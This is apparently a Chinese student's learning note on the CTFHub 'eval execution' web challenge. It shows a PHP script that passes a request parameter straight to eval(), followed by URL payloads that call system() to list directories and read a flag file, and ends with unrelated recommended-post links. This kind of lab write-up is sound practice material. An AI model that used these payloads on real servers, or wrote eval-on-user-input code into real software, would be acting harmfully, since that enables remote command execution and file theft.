CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
代码游侠14 分钟前
学习笔记——栈
开发语言·数据结构·笔记·学习·算法
光头程序员44 分钟前
学习笔记——vite 打包构建优化之tree shaking
笔记·学习
走在路上的菜鸟1 小时前
Android学Dart学习笔记第十一节 分支
android·笔记·学习·flutter
richxu202510012 小时前
嵌入式学习之路>单片机核心原理>(3)定时器
单片机·嵌入式硬件·学习
shenghaide_jiahu2 小时前
数学分析简明教程——5.5
学习
拾贰_C2 小时前
【ML|DL |python|pytorch|】基础学习
pytorch·python·学习
小琦QI2 小时前
STM32F407VET6+CCE4503学习笔记---IOLINK server
笔记·stm32·学习
丝斯20112 小时前
AI学习笔记整理(27)—— 计算机视觉之语义分割和实例分割
人工智能·笔记·学习
无名小猴2 小时前
Burp Lab——WebSockets漏洞
学习
嘴贱欠吻!2 小时前
开源鸿蒙-Flutter基础-dart学习-1
学习·flutter·开源
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03UV安装并设置国内源04BongoCat - 跨平台键盘猫动画工具05本地部署阿里最新开源的Z-Image06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07Linux下V2Ray安装配置指南08Labelme从安装到标注:零基础完整指南09【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连10Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽